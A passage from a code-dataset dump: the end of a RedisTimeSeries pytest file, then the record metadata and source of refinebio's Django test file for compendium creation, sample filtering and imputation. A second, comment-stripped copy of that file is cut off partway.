with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER_BY_VALUE', "a", 1 ,'FILTER', 'name=bob')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER_BY_VALUE', "a", "a" ,'FILTER', 'name=bob')
with pytest.raises(redis.ResponseError) as excinfo:
assert r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER_BY_VALUE', 1, "a" ,'FILTER', 'name=bob')
expected_result = [[b'tester1', [], []],
[b'tester2', [], [[start_ts + i, str(15).encode('ascii')] for i in range(samples_count)]],
[b'tester3', [], []],
]
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER_BY_VALUE', 10, 20,'FILTER', 'generation=x')
env.assertEqual(sorted(actual_result), sorted(expected_result))
expected_result = [[b'tester1', [], []],
[b'tester2', [], [[start_ts + i, str(15).encode('ascii')] for i in range(9, 12)]],
[b'tester3', [], []],
]
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'FILTER_BY_TS', start_ts+9, start_ts+10, start_ts+11, 'FILTER_BY_VALUE', 10, 20,'FILTER', 'generation=x')
env.assertEqual(sorted(actual_result), sorted(expected_result))
def test_mrange_withlabels():
start_ts = 1511885909
samples_count = 50
with Env().getClusterConnectionIfNeeded() as r:
assert r.execute_command('TS.CREATE', 'tester1', 'LABELS', 'name', 'bob', 'class', 'middle', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester2', 'LABELS', 'name', 'rudy', 'class', 'junior', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester3', 'LABELS', 'name', 'fabi', 'class', 'top', 'generation', 'x')
_insert_data(r, 'tester1', start_ts, samples_count, 5)
_insert_data(r, 'tester2', start_ts, samples_count, 15)
_insert_data(r, 'tester3', start_ts, samples_count, 25)
expected_result = [[start_ts + i, str(5).encode('ascii')] for i in range(samples_count)]
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'WITHLABELS', 'FILTER',
'name=bob')
assert [[b'tester1', [[b'name', b'bob'], [b'class', b'middle'], [b'generation', b'x']],
expected_result]] == actual_result
actual_result = r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'SELECTED_LABELS', 'name', 'generation', 'FILTER',
'name=bob')
assert [[b'tester1', [[b'name', b'bob'], [b'generation', b'x']],
expected_result]] == actual_result
actual_result = r.execute_command('TS.mrange', start_ts + 1, start_ts + samples_count, 'WITHLABELS',
'AGGREGATION', 'COUNT', 1, 'FILTER', 'generation=x')
try:
assert len(actual_result[0][1]) != 3 or len(actual_result[1][1]) != 3 or len(actual_result[2][1]) == 3
except Exception as ex:
print(str(actual_result))
res = r.execute_command('TS.INFO', 'tester1')
print(str(res))
res = r.execute_command('TS.INFO', 'tester2')
print(str(res))
res = r.execute_command('TS.INFO', 'tester3')
print(str(res))
raise ex
assert len(actual_result[0][1]) == 3
assert len(actual_result[1][1]) == 3
assert len(actual_result[2][1]) == 3
def test_multilabel_filter():
with Env().getClusterConnectionIfNeeded() as r:
assert r.execute_command('TS.CREATE', 'tester1', 'LABELS', 'name', 'bob', 'class', 'middle', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester2', 'LABELS', 'name', 'rudy', 'class', 'junior', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester3', 'LABELS', 'name', 'fabi', 'class', 'top', 'generation', 'x')
assert r.execute_command('TS.ADD', 'tester1', 0, 1) == 0
assert r.execute_command('TS.ADD', 'tester2', 0, 2) == 0
assert r.execute_command('TS.ADD', 'tester3', 0, 3) == 0
actual_result = r.execute_command('TS.mrange', '-', '+', 'WITHLABELS', 'FILTER', 'name=(bob,rudy)')
assert set(item[0] for item in actual_result) == set([b'tester1', b'tester2'])
actual_result = r.execute_command('TS.mrange', 0, '+', 'WITHLABELS', 'FILTER', 'name=(bob,rudy)',
'class!=(middle,top)')
assert actual_result[0][0] == b'tester2'
actual_result = r.execute_command('TS.mget', 'WITHLABELS', 'FILTER', 'name=(bob,rudy)')
assert set(item[0] for item in actual_result) == set([b'tester1', b'tester2'])
actual_result = r.execute_command('TS.mget', 'WITHLABELS', 'FILTER', 'name=(bob,rudy)', 'class!=(middle,top)')
assert actual_result[0][0] == b'tester2'
def test_large_key_value_pairs():
with Env().getClusterConnectionIfNeeded() as r:
number_series = 100
for i in range(0,number_series):
assert r.execute_command('TS.CREATE', 'ts-{}'.format(i), 'LABELS', 'baseAsset', '17049', 'counterAsset', '840', 'source', '1000', 'dataType', 'PRICE_TICK')
kv_label1 = 'baseAsset=(13830,10249,16019,10135,17049,10777,10138,11036,11292,15778,11043,10025,11436,12207,13359,10807,12216,11833,10170,10811,12864,12738,10053,11334,12487,12619,12364,13266,11219,15827,12374,11223,10071,12249,11097,14430,13282,16226,13667,11365,12261,12646,12650,12397,12785,13941,10231,16254,12159,15103)'
kv_label2 = 'counterAsset=(840)'
kv_label3 = 'source=(1000)'
kv_label4 = 'dataType=(PRICE_TICK)'
kv_labels = [kv_label1, kv_label2, kv_label3, kv_label4]
for kv_label in kv_labels:
res = r.execute_command('TS.MRANGE', '-', '+', 'FILTER', kv_label1)
assert len(res) == number_series
def ensure_replies_series_match(env,series_array_1, series_array_2):
for ts in series_array_1:
ts_name = ts[0]
ts_labels =ts[1]
ts_values =ts[2]
for comparison_ts in series_array_2:
comparison_ts_name = comparison_ts[0]
comparison_ts_labels =comparison_ts[1]
comparison_ts_values =comparison_ts[2]
if ts_name == comparison_ts_name:
env.assertEqual(ts_labels,comparison_ts_labels)
env.assertEqual(ts_values,comparison_ts_values)
def test_non_local_data():
env = Env()
with env.getClusterConnectionIfNeeded() as r:
r.execute_command('TS.ADD', '{host1}_metric_1', 1 ,100, 'LABELS', 'metric', 'cpu')
r.execute_command('TS.ADD', '{host1}_metric_2', 2 ,40, 'LABELS', 'metric', 'cpu')
r.execute_command('TS.ADD', '{host1}_metric_1', 2, 95)
r.execute_command('TS.ADD', '{host1}_metric_1', 10, 99)
previous_results = []
for shard in range(0, env.shardsCount):
shard_conn = env.getConnection(shard)
actual_result = shard_conn.execute_command('TS.MRANGE - + FILTER metric=cpu')
env.assertEqual(len(actual_result),2)
for previous_result in previous_results:
ensure_replies_series_match(env,previous_result,actual_result)
previous_results.append(actual_result)
def test_non_local_filtered_data():
env = Env()
with env.getClusterConnectionIfNeeded() as r:
r.execute_command('TS.ADD', '{host1}_metric_1', 1 ,100, 'LABELS', 'metric', 'cpu')
r.execute_command('TS.ADD', '{host1}_metric_2', 2 ,40, 'LABELS', 'metric', 'cpu')
r.execute_command('TS.ADD', '{host1}_metric_1', 2, 95)
r.execute_command('TS.ADD', '{host1}_metric_1', 10, 99)
previous_results = []
for shard in range(0, env.shardsCount):
shard_conn = env.getConnection(shard)
actual_result = shard_conn.execute_command('TS.MRANGE - + FILTER_BY_TS 11 5 25 55 101 18 9 1900 2 FILTER metric=cpu')
env.assertEqual(len(actual_result),2)
for serie in actual_result:
serie_ts = serie[2]
env.assertEqual(len(serie_ts),1)
env.assertEqual(serie_ts[0][0],2)
for previous_result in previous_results:
ensure_replies_series_match(env,previous_result,actual_result)
previous_results.append(actual_result)
def test_non_local_filtered_labels():
env = Env()
with env.getClusterConnectionIfNeeded() as r:
r.execute_command('TS.ADD', '{host1}_metric_1', 1 ,100, 'LABELS', 'metric', 'cpu', '')
r.execute_command('TS.ADD', '{host1}_metric_2', 2 ,40, 'LABELS', 'metric', 'cpu')
r.execute_command('TS.ADD', '{host1}_metric_1', 2, 95)
r.execute_command('TS.ADD', '{host1}_metric_1', 10, 99)
previous_results = []
for shard in range(0, env.shardsCount):
shard_conn = env.getConnection(shard)
actual_result = shard_conn.execute_command('TS.MRANGE - + FILTER_BY_TS 2 SELECTED_LABELS metric FILTER metric=cpu')
env.assertEqual(len(actual_result),2)
for previous_result in previous_results:
ensure_replies_series_match(env,previous_result,actual_result)
previous_results.append(actual_result)
def test_mrange_align():
start_ts = 1511885909
samples_count = 50
with Env(decodeResponses=True).getClusterConnectionIfNeeded() as r:
assert r.execute_command('TS.CREATE', 'tester1', 'LABELS', 'name', 'bob', 'class', 'middle', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester2', 'LABELS', 'name', 'rudy', 'class', 'junior', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester3', 'LABELS', 'name', 'fabi', 'class', 'top', 'generation', 'x')
_insert_data(r, 'tester1', start_ts, samples_count, 5)
_insert_data(r, 'tester2', start_ts, samples_count, 15)
_insert_data(r, 'tester3', start_ts, samples_count, 25)
end_ts = start_ts + samples_count
agg_bucket_size = 15
expected_start_result = [
['tester1', [], build_expected_aligned_data(start_ts, start_ts + samples_count, agg_bucket_size, start_ts)],
['tester2', [], build_expected_aligned_data(start_ts, start_ts + samples_count, agg_bucket_size, start_ts)],
['tester3', [], build_expected_aligned_data(start_ts, start_ts + samples_count, agg_bucket_size, start_ts)],
]
expected_end_result = [
['tester1', [], build_expected_aligned_data(start_ts, start_ts + samples_count, agg_bucket_size, end_ts)],
['tester2', [], build_expected_aligned_data(start_ts, start_ts + samples_count, agg_bucket_size, end_ts)],
['tester3', [], build_expected_aligned_data(start_ts, start_ts + samples_count, agg_bucket_size, end_ts)],
]
assert expected_start_result == decode_if_needed(sorted(r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'ALIGN', '-',
'AGGREGATION', 'COUNT', agg_bucket_size, 'FILTER', 'generation=x')))
assert expected_end_result == decode_if_needed(sorted(r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'ALIGN', '+',
'AGGREGATION', 'COUNT', agg_bucket_size, 'FILTER', 'generation=x')))
def groupby(data):
result = defaultdict(lambda: 0)
for key, labels, samples in data:
for sample in samples:
result[sample[0]] = max(result[sample[0]], int(sample[1]))
return [[s[0], str(s[1])] for s in result.items()]
expected_groupby_start_result = [['generation=x', [], groupby(expected_start_result)]]
expected_groupby_end_result = [['generation=x', [], groupby(expected_end_result)]]
assert expected_groupby_start_result == decode_if_needed(r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'ALIGN', '-', 'AGGREGATION',
'COUNT', agg_bucket_size, 'FILTER', 'generation=x',
'GROUPBY', 'generation', 'REDUCE', 'max'))
assert expected_groupby_end_result == decode_if_needed(r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'ALIGN', '+', 'AGGREGATION',
'COUNT', agg_bucket_size, 'FILTER', 'generation=x',
'GROUPBY', 'generation', 'REDUCE', 'max'))
| true
| true
|
1c4234181841813e745a8ada5c9d0aa53e8be2dc
| 24,222
|
py
|
Python
|
workers/data_refinery_workers/processors/test_compendia.py
|
AlexsLemonade/refinebio
|
52f44947f902adedaccf270d5f9dbd56ab47e40a
|
[
"BSD-3-Clause"
] | 106
|
2018-03-05T16:24:47.000Z
|
2022-03-19T19:12:25.000Z
|
workers/data_refinery_workers/processors/test_compendia.py
|
AlexsLemonade/refinebio
|
52f44947f902adedaccf270d5f9dbd56ab47e40a
|
[
"BSD-3-Clause"
] | 1,494
|
2018-02-27T17:02:21.000Z
|
2022-03-24T15:10:30.000Z
|
workers/data_refinery_workers/processors/test_compendia.py
|
AlexsLemonade/refinebio
|
52f44947f902adedaccf270d5f9dbd56ab47e40a
|
[
"BSD-3-Clause"
] | 15
|
2019-02-03T01:34:59.000Z
|
2022-03-29T01:59:13.000Z
|
import copy
import itertools
import json
import math
import os
import random
import zipfile
from typing import Dict
from django.test import TransactionTestCase, tag
import numpy as np
import pandas as pd
from data_refinery_common.enums import PipelineEnum, ProcessorPipeline
from data_refinery_common.models import (
ComputationalResult,
ComputationalResultAnnotation,
ComputedFile,
Dataset,
Experiment,
ExperimentSampleAssociation,
Organism,
Pipeline,
ProcessorJob,
ProcessorJobDatasetAssociation,
Sample,
SampleComputedFileAssociation,
SampleResultAssociation,
)
from data_refinery_workers.processors import create_compendia, utils
from data_refinery_workers.processors.testing_utils import ProcessorJobTestCaseMixin
def create_sample_for_experiment(sample_info: Dict, experiment: Experiment) -> Sample:
result = ComputationalResult()
result.save()
sample = Sample()
sample.accession_code = sample_info["accession_code"]
sample.title = sample_info.get("title", None) or sample_info["accession_code"]
sample.organism = sample_info["organism"]
sample.technology = sample_info["technology"]
sample.save()
sra = SampleResultAssociation()
sra.sample = sample
sra.result = result
sra.save()
esa = ExperimentSampleAssociation()
esa.experiment = experiment
esa.sample = sample
esa.save()
if sample_info.get("filename") is not None:
computed_file = ComputedFile()
computed_file.filename = sample_info["filename"]
computed_file.absolute_file_path = sample_info["data_dir"] + sample_info["filename"]
computed_file.result = result
computed_file.size_in_bytes = 123
computed_file.is_smashable = True
computed_file.save()
assoc = SampleComputedFileAssociation()
assoc.sample = sample
assoc.computed_file = computed_file
assoc.save()
return sample
class CompendiaTestCase(TransactionTestCase, ProcessorJobTestCaseMixin):
@tag("compendia")
def test_create_compendia(self):
DATA_DIR = "/home/user/data_store/PCL/"
job = ProcessorJob()
job.pipeline_applied = ProcessorPipeline.CREATE_COMPENDIA.value
job.save()
gallus_gallus = Organism.get_object_for_name("GALLUS_GALLUS", taxonomy_id=1001)
# MICROARRAY TECH
(experiment, _) = Experiment.objects.get_or_create(accession_code="GSE1487313")
experiment.accession_code = "GSE1487313"
experiment.save()
create_sample_for_experiment(
{
"organism": gallus_gallus,
"accession_code": "GSM1487313",
"technology": "MICROARRAY",
"filename": "GSM1487313_liver.PCL",
"data_dir": DATA_DIR,
},
experiment,
)
# Missing sample that will be filtered
create_sample_for_experiment(
{
"organism": gallus_gallus,
"accession_code": "GSM1487222",
"title": "this sample will be filtered",
"technology": "MICROARRAY",
"filename": "GSM1487222_empty.PCL",
"data_dir": DATA_DIR,
},
experiment,
)
# RNASEQ TECH
experiment2 = Experiment()
experiment2.accession_code = "SRP149598"
experiment2.save()
create_sample_for_experiment(
{
"organism": gallus_gallus,
"accession_code": "SRR7250867",
"technology": "RNA-SEQ",
"filename": "SRP149598_gene_lengthScaledTPM.tsv",
"data_dir": DATA_DIR,
},
experiment,
)
dset = Dataset()
dset.data = {
"GSE1487313": ["GSM1487313", "GSM1487222"],
"SRP149598": ["SRR7250867"],
}
dset.scale_by = "NONE"
dset.aggregate_by = "SPECIES"
dset.svd_algorithm = "ARPACK"
dset.quantile_normalize = True
dset.save()
pjda = ProcessorJobDatasetAssociation()
pjda.processor_job = job
pjda.dataset = dset
pjda.save()
final_context = create_compendia.create_compendia(job.id)
# Because one of the samples is filtered out, there will be too few
# remaining samples to smash together, so we expect this job to fail.
self.assertFailed(job, "k must be between 1 and min(A.shape)")
# check that sample with no computed file was skipped
self.assertTrue("GSM1487222" in final_context["filtered_samples"])
self.assertEqual(
final_context["filtered_samples"]["GSM1487222"]["experiment_accession_code"],
"GSE1487313",
)
@tag("compendia")
def test_create_compendia_danio(self):
job = ProcessorJob()
job.pipeline_applied = ProcessorPipeline.CREATE_COMPENDIA.value
job.save()
# MICROARRAY TECH
experiment = Experiment()
experiment.accession_code = "GSE1234"
experiment.save()
result = ComputationalResult()
result.save()
qn_target = ComputedFile()
qn_target.filename = "danio_target.tsv"
qn_target.absolute_file_path = "/home/user/data_store/QN/danio_target.tsv"
qn_target.is_qn_target = True
qn_target.size_in_bytes = "12345"
qn_target.sha1 = "aabbccddeeff"
qn_target.result = result
qn_target.save()
danio_rerio = Organism(name="DANIO_RERIO", taxonomy_id=1, qn_target=result)
danio_rerio.save()
cra = ComputationalResultAnnotation()
cra.data = {}
cra.data["organism_id"] = danio_rerio.id
cra.data["is_qn"] = True
cra.result = result
cra.save()
result = ComputationalResult()
result.save()
micros = []
for file in os.listdir("/home/user/data_store/raw/TEST/MICROARRAY/"):
if "microarray.txt" in file:
continue
create_sample_for_experiment(
{
"organism": danio_rerio,
"accession_code": file,
"technology": "MICROARRAY",
"filename": file,
"data_dir": "/home/user/data_store/raw/TEST/MICROARRAY/",
},
experiment,
)
micros.append(file)
experiment = Experiment()
experiment.accession_code = "GSE5678"
experiment.save()
result = ComputationalResult()
result.save()
rnas = []
for file in os.listdir("/home/user/data_store/raw/TEST/RNASEQ/"):
if "rnaseq.txt" in file:
continue
create_sample_for_experiment(
{
"organism": danio_rerio,
"accession_code": file,
"technology": "RNA-SEQ",
"filename": file,
"data_dir": "/home/user/data_store/raw/TEST/RNASEQ/",
},
experiment,
)
rnas.append(file)
# Missing sample that will be filtered
sample = create_sample_for_experiment(
{
"organism": danio_rerio,
"accession_code": "GSM1487222",
"title": "this sample will be filtered",
"technology": "RNA-SEQ",
"filename": None,
},
experiment,
)
rnas.append(sample.accession_code)
dset = Dataset()
dset.data = {"GSE1234": micros, "GSE5678": rnas}
dset.scale_by = "NONE"
dset.aggregate_by = "SPECIES"
dset.svd_algorithm = "ARPACK"
dset.quantile_normalize = True
dset.save()
pjda = ProcessorJobDatasetAssociation()
pjda.processor_job = job
pjda.dataset = dset
pjda.save()
final_context = create_compendia.create_compendia(job.id)
self.assertSucceeded(job)
# Verify result
self.assertEqual(final_context["compendium_result"].result.computedfile_set.count(), 1)
for file in final_context["compendium_result"].result.computedfile_set.all():
self.assertTrue(os.path.exists(file.absolute_file_path))
# test compendium_result
self.assertEqual(final_context["compendium_result"].svd_algorithm, "ARPACK")
self.assertEqual(
final_context["compendium_result"].primary_organism.name,
final_context["organism_name"],
)
self.assertEqual(final_context["compendium_result"].primary_organism.name, "DANIO_RERIO")
self.assertEqual(final_context["compendium_result"].organisms.count(), 1)
self.assertEqual(len(final_context["filtered_samples"]), 10)
# check that sample with no computed file was skipped
self.assertTrue("GSM1487222" in final_context["filtered_samples"])
self.assertEqual(
final_context["filtered_samples"]["GSM1487222"]["experiment_accession_code"], "GSE5678"
)
self.assertIn(
"This sample did not have a processed file",
final_context["filtered_samples"]["GSM1487222"]["reason"],
)
# check that the 9 files with lots of missing measurements were filtered
self.assertEqual(
len(
list(
filter(
lambda x: "less than 50% present values" in x["reason"],
final_context["filtered_samples"].values(),
)
)
),
9,
)
zf = zipfile.ZipFile(
final_context["compendium_result"].result.computedfile_set.first().absolute_file_path
)
with zf.open("aggregated_metadata.json") as f:
metadata = json.load(f)
self.assertFalse(metadata.get("quant_sf_only"))
self.assertEqual(metadata.get("compendium_version"), 1)
# 420 microarray + 420 RNA seq
# -1 that is filtered for a missing file
# -9 that are filtered for having less than 50% present values
self.assertEqual(metadata.get("num_samples"), 830)
self.assertEqual(metadata.get("num_experiments"), 2)
# Make sure the data were quantile normalized
self.assertTrue(metadata.get("quantile_normalized"))
self.assertIn("ks_statistic", final_context)
self.assertIn("ks_pvalue", final_context)
self.assertEqual(final_context["ks_pvalue"], 1.0)
@tag("compendia")
def test_create_compendia_microarray_only(self):
"""
Make sure that we can actually create a compendium with just microarray samples.
"""
job = ProcessorJob()
job.pipeline_applied = ProcessorPipeline.CREATE_COMPENDIA.value
job.save()
# MICROARRAY TECH
experiment = Experiment()
experiment.accession_code = "GSE1234"
experiment.save()
result = ComputationalResult()
result.save()
qn_target = ComputedFile()
qn_target.filename = "danio_target.tsv"
qn_target.absolute_file_path = "/home/user/data_store/QN/danio_target.tsv"
qn_target.is_qn_target = True
qn_target.size_in_bytes = "12345"
qn_target.sha1 = "aabbccddeeff"
qn_target.result = result
qn_target.save()
danio_rerio = Organism(name="DANIO_RERIO", taxonomy_id=1, qn_target=result)
danio_rerio.save()
cra = ComputationalResultAnnotation()
cra.data = {}
cra.data["organism_id"] = danio_rerio.id
cra.data["is_qn"] = True
cra.result = result
cra.save()
result = ComputationalResult()
result.save()
micros = []
for file in os.listdir("/home/user/data_store/raw/TEST/MICROARRAY/"):
if "microarray.txt" in file:
continue
create_sample_for_experiment(
{
"organism": danio_rerio,
"accession_code": file,
"technology": "MICROARRAY",
"filename": file,
"data_dir": "/home/user/data_store/raw/TEST/MICROARRAY/",
},
experiment,
)
micros.append(file)
dset = Dataset()
dset.data = {"GSE1234": micros}
dset.scale_by = "NONE"
dset.aggregate_by = "SPECIES"
dset.svd_algorithm = "ARPACK"
dset.quantile_normalize = True
dset.save()
pjda = ProcessorJobDatasetAssociation()
pjda.processor_job = job
pjda.dataset = dset
pjda.save()
final_context = create_compendia.create_compendia(job.id)
self.assertSucceeded(job)
# Verify result
self.assertEqual(final_context["compendium_result"].result.computedfile_set.count(), 1)
for file in final_context["compendium_result"].result.computedfile_set.all():
self.assertTrue(os.path.exists(file.absolute_file_path))
# test compendium_result
self.assertEqual(final_context["compendium_result"].svd_algorithm, "ARPACK")
self.assertEqual(
final_context["compendium_result"].primary_organism.name,
final_context["organism_name"],
)
self.assertEqual(final_context["compendium_result"].primary_organism.name, "DANIO_RERIO")
self.assertEqual(final_context["compendium_result"].organisms.count(), 1)
zf = zipfile.ZipFile(
final_context["compendium_result"].result.computedfile_set.first().absolute_file_path
)
with zf.open("aggregated_metadata.json") as f:
metadata = json.load(f)
self.assertFalse(metadata.get("quant_sf_only"))
# 420 microarray
self.assertEqual(metadata.get("num_samples"), 420)
self.assertEqual(metadata.get("num_experiments"), 1)
# Make sure the data were quantile normalized
self.assertTrue(metadata.get("quantile_normalized"))
self.assertIn("ks_statistic", final_context)
self.assertIn("ks_pvalue", final_context)
self.assertEqual(final_context["ks_pvalue"], 1.0)
@tag("compendia")
def test_filter_rnaseq_matrix_drop_row_sums(self):
job = ProcessorJob()
job.pipeline_applied = ProcessorPipeline.CREATE_COMPENDIA.value
job.save()
samples = list(str(i) for i in range(0, 10))
df = pd.DataFrame(columns=samples)
for i in range(1, 101):
df.loc[str(i)] = {idx: i for idx in samples}
job_context = {"rnaseq_matrix": df, "job": job}
final_job_context = create_compendia._filter_rnaseq_matrix(job_context)
filtered_matrix = final_job_context["filtered_rnaseq_matrix"]
# Make sure that we are getting rid of intermediate results
# appropriately. Because these matrices can be pretty heavy, the input
# should not stick around in the job context like this.
self.assertNotIn("rnaseq_matrix", final_job_context.keys())
# We drop all rows below the 10th percentile in row sum, so we would
# expect to drop rows 1 through 10 that we created above
self.assertEqual(set(filtered_matrix.index), set(str(i) for i in range(11, 101)))
@tag("compendia")
def test_drop_samples(self):
"""Make sure that we drop samples with >50% missing values"""
job = ProcessorJob()
job.pipeline_applied = ProcessorPipeline.CREATE_COMPENDIA.value
job.save()
danio_rerio = Organism(name="DANIO_RERIO", taxonomy_id=1)
danio_rerio.save()
experiment = Experiment()
experiment.accession_code = "GSE1234"
experiment.save()
samples = list(str(i) for i in range(0, 10))
for i in samples:
create_sample_for_experiment(
{"organism": danio_rerio, "accession_code": i, "technology": "MICROARRAY"},
experiment,
)
dset = Dataset()
dset.data = {"GSE1234": "ALL"}
dset.scale_by = "NONE"
dset.aggregate_by = "SPECIES"
dset.svd_algorithm = "ARPACK"
dset.quantile_normalize = True
dset.save()
df = pd.DataFrame(columns=samples)
for i in range(1, 101):
row_i = {idx: i for idx in samples}
if i % 3 != 0 and i % 3 != 1:
del row_i["0"]
if i % 2 != 0:
del row_i["1"]
if i % 3 != 0:
del row_i["2"]
if i % 4 != 0:
del row_i["3"]
df.loc[str(i)] = row_i
job_context = {
"microarray_matrix": df,
"job": job,
"dataset": dset,
# This key is added in the setup code, so we need to add it ourselves here
"filtered_samples": {},
}
job_context = create_compendia._full_outer_join_gene_matrices(job_context)
final_job_context = create_compendia._filter_rows_and_columns(job_context)
filtered_matrix = final_job_context["row_col_filtered_matrix"]
# Columns 0 and 1 have missing data, but they should still have >= 50%.
# Columns 2 and 3 are both missing >50% though, so they should be filtered.
self.assertEqual(set(filtered_matrix.columns), {"0", "1"} | {str(i) for i in range(4, 10)})
self.assertEqual(set(final_job_context["filtered_samples"].keys()), {"2", "3"})
for v in final_job_context["filtered_samples"].values():
self.assertIn("less than 50% present", v["reason"])
@tag("compendia")
def test_imputation(self):
job = ProcessorJob()
job.pipeline_applied = ProcessorPipeline.CREATE_COMPENDIA.value
job.save()
# MICROARRAY TECH
experiment = Experiment()
experiment.accession_code = "GSE1234"
experiment.save()
result = ComputationalResult()
result.save()
qn_target = ComputedFile()
qn_target.filename = "danio_target.tsv"
qn_target.absolute_file_path = "/home/user/data_store/QN/danio_target.tsv"
qn_target.is_qn_target = True
qn_target.size_in_bytes = "12345"
qn_target.sha1 = "aabbccddeeff"
qn_target.result = result
qn_target.save()
danio_rerio = Organism(name="DANIO_RERIO", taxonomy_id=1, qn_target=result)
danio_rerio.save()
cra = ComputationalResultAnnotation()
cra.data = {}
cra.data["organism_id"] = danio_rerio.id
cra.data["is_qn"] = True
cra.result = result
cra.save()
result = ComputationalResult()
result.save()
micros = []
for file in os.listdir("/home/user/data_store/raw/TEST/MICROARRAY/"):
if "microarray.txt" in file:
continue
create_sample_for_experiment(
{
"organism": danio_rerio,
"accession_code": file,
"technology": "MICROARRAY",
"filename": file,
"data_dir": "/home/user/data_store/raw/TEST/MICROARRAY/",
},
experiment,
)
micros.append(file)
experiment = Experiment()
experiment.accession_code = "GSE5678"
experiment.save()
result = ComputationalResult()
result.save()
rnas = []
for file in os.listdir("/home/user/data_store/raw/TEST/RNASEQ/"):
if "rnaseq.txt" in file:
continue
create_sample_for_experiment(
{
"organism": danio_rerio,
"accession_code": file,
"technology": "RNA-SEQ",
"filename": file,
"data_dir": "/home/user/data_store/raw/TEST/RNASEQ/",
},
experiment,
)
rnas.append(file)
# Missing sample that will be filtered
sample = create_sample_for_experiment(
{
"organism": danio_rerio,
"accession_code": "GSM1487222",
"title": "this sample will be filtered",
"technology": "RNA-SEQ",
"filename": None,
},
experiment,
)
rnas.append(sample.accession_code)
dset = Dataset()
dset.data = {"GSE1234": micros, "GSE5678": rnas}
dset.scale_by = "NONE"
dset.aggregate_by = "SPECIES"
dset.svd_algorithm = "ARPACK"
dset.quantile_normalize = True
dset.save()
pjda = ProcessorJobDatasetAssociation()
pjda.processor_job = job
pjda.dataset = dset
pjda.save()
imputation_index = create_compendia.COMPENDIA_PIPELINE.index(
create_compendia._perform_imputation
)
pipeline = Pipeline(name=PipelineEnum.CREATE_COMPENDIA.value)
job_context = utils.run_pipeline(
{"job_id": job.id, "pipeline": pipeline},
create_compendia.COMPENDIA_PIPELINE[:imputation_index],
)
# First, run the imputation step without removing anything to get a baseline
expected_context = utils.run_pipeline(
job_context.copy(), [create_compendia.COMPENDIA_PIPELINE[imputation_index]]
)
# Now pick some rows to remove according to the instructions from
# https://github.com/AlexsLemonade/refinebio/pull/2879#issuecomment-895143336
random.seed(42)
# Select some rows randomly and mask a little bit less than 30% of the values
rare_rows = random.sample(list(job_context["microarray_matrix"].index), k=25)
rare_genes = {}
for row in rare_rows:
cols = random.sample(
list(job_context["microarray_matrix"].columns),
# There are around 840 samples, and we want to pick a little bit
# less than 30% of them
k=int(0.28 * 840),
)
rare_genes[row] = cols
for col in cols:
job_context["microarray_matrix"].loc[row, col] = np.nan
# Now randomly select some entries from the other rows to mask
individual_indices = random.sample(
list(
itertools.product(
set(job_context["microarray_matrix"].index) - set(rare_rows),
job_context["microarray_matrix"].columns,
)
),
k=1000,
)
for row, col in individual_indices:
job_context["microarray_matrix"].loc[row, col] = np.nan
final_context = utils.run_pipeline(
job_context, [create_compendia.COMPENDIA_PIPELINE[imputation_index]]
)
self.assertDidNotFail(job)
index = set(final_context["merged_no_qn"].index) & set(
expected_context["merged_no_qn"].index
)
columns = set(final_context["merged_no_qn"].columns) & set(
expected_context["merged_no_qn"].columns
)
# Calculate the Root-Mean-Square Error (RMSE) of the imputed values.
# See https://en.wikipedia.org/wiki/Root-mean-square_deviation
# for a description of the formula.
N = 0
squared_error = 0
affected_entries = {
*individual_indices,
*((row, col) for row, cols in rare_genes.items() for col in cols),
}
for row, col in affected_entries:
if row in index and col in columns:
actual = final_context["merged_no_qn"].loc[row, col]
expected = expected_context["merged_no_qn"].loc[row, col]
N += 1
squared_error += (actual - expected) ** 2
rmse = math.sqrt(squared_error / N)
# The results of a previous run plus a little bit of leeway
self.assertLess(abs(rmse - 0.2868600293662542), 0.05)
| 33.782427
| 99
| 0.592313
|
import copy
import itertools
import json
import math
import os
import random
import zipfile
from typing import Dict
from django.test import TransactionTestCase, tag
import numpy as np
import pandas as pd
from data_refinery_common.enums import PipelineEnum, ProcessorPipeline
from data_refinery_common.models import (
ComputationalResult,
ComputationalResultAnnotation,
ComputedFile,
Dataset,
Experiment,
ExperimentSampleAssociation,
Organism,
Pipeline,
ProcessorJob,
ProcessorJobDatasetAssociation,
Sample,
SampleComputedFileAssociation,
SampleResultAssociation,
)
from data_refinery_workers.processors import create_compendia, utils
from data_refinery_workers.processors.testing_utils import ProcessorJobTestCaseMixin
def create_sample_for_experiment(sample_info: Dict, experiment: Experiment) -> Sample:
result = ComputationalResult()
result.save()
sample = Sample()
sample.accession_code = sample_info["accession_code"]
sample.title = sample_info.get("title", None) or sample_info["accession_code"]
sample.organism = sample_info["organism"]
sample.technology = sample_info["technology"]
sample.save()
sra = SampleResultAssociation()
sra.sample = sample
sra.result = result
sra.save()
esa = ExperimentSampleAssociation()
esa.experiment = experiment
esa.sample = sample
esa.save()
if sample_info.get("filename") is not None:
computed_file = ComputedFile()
computed_file.filename = sample_info["filename"]
computed_file.absolute_file_path = sample_info["data_dir"] + sample_info["filename"]
computed_file.result = result
computed_file.size_in_bytes = 123
computed_file.is_smashable = True
computed_file.save()
assoc = SampleComputedFileAssociation()
assoc.sample = sample
assoc.computed_file = computed_file
assoc.save()
return sample
class CompendiaTestCase(TransactionTestCase, ProcessorJobTestCaseMixin):
@tag("compendia")
def test_create_compendia(self):
DATA_DIR = "/home/user/data_store/PCL/"
job = ProcessorJob()
job.pipeline_applied = ProcessorPipeline.CREATE_COMPENDIA.value
job.save()
gallus_gallus = Organism.get_object_for_name("GALLUS_GALLUS", taxonomy_id=1001)
